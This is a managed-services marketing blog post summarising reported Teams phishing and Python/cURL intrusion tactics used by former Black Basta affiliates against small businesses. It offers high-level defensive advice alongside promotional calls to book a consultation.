Former Black Basta Hackers Target SMBs Using Microsoft Teams and Python Scripts: What You Need to Know
Think Teams messages and routine emails are safe? Think again. A recent escalation in cyberattacks shows former Black Basta ransomware members exploiting Microsoft Teams and Python scripts to breach business networks, putting small and midsize businesses (SMBs) more than ever in the crosshairs (Source).
Why Does This Security Shift Matter to SMBs?
Cybercriminals aren’t just targeting Fortune 500 giants—they know SMBs often lack enterprise-grade protections. Hackers are now infiltrating SMBs through familiar workplace tools like Microsoft Teams, bypassing traditional email defenses and leveraging automated Python scripts to deploy threats. One small slip—like clicking a Teams message—can lead to data theft, downtime, and financial losses.
What’s New About These Attacks?
Researchers at ReliaQuest recently observed former Black Basta affiliates combining their hallmark “email bombing” tactics with Microsoft Teams phishing, then running malicious Python scripts to establish ongoing access. These scripts use cURL commands to quietly download more dangerous files, making infections harder to detect and remediate. If your staff are collaborating via Teams or opening dozens of daily emails, these vectors are likely already at your digital front door.
Fact: 94% of malware is delivered by email, but attacks via collaboration tools like Teams are surging (Verizon DBIR 2024).
How confident are you in your protections beyond email? Book a quick discovery call and we’ll review your Teams security posture—free of charge.
Key Takeaways for SMB Decision-Makers
- Recognize new phishing channels: Don’t assume Teams is safer than email—user awareness training and Teams-specific security measures are critical.
- Restrict script execution: Disallow unauthorized Python execution and cURL downloads on endpoints, especially for non-IT users.
- Enable multi-factor authentication: MFA on both email and Teams makes it drastically harder for attackers to gain persistent access.
- Monitor suspicious activity: Deploy automated threat detection for abnormal Teams conversations, file transfers, and user behaviors.
- Have a rapid response plan: Create and test an incident response playbook for email, Teams, and endpoint breaches—speed matters.
How to Secure, Simplify, and Reduce Your Cyber Risk—Fast
This new wave of attacks proves you can’t rely solely on email filtering or antivirus. SMBs need layered protections that adapt to evolving threats:
- Update policies now: Block macros and scripting tools (like Python, cURL) unless absolutely necessary for business tasks.
- Review Teams settings: Disable external messages or tightly control who can initiate conversations.
- Ongoing user training: Run regular, simulated phishing and Teams attack scenarios using realistic examples.
- Predictable IT costs: Managed services can deploy these improvements and respond swiftly when attacks occur—without costly surprises.
Don’t let the next attack catch your business off guard. BoltWork’s managed cybersecurity services continually update your defenses to stay ahead, letting you focus on your core business—not firefighting digital threats.
Ready to stop ransomware and phishing attacks at the source?
Book a 15-min security consult with BoltWork experts today—get actionable recommendations with no obligation.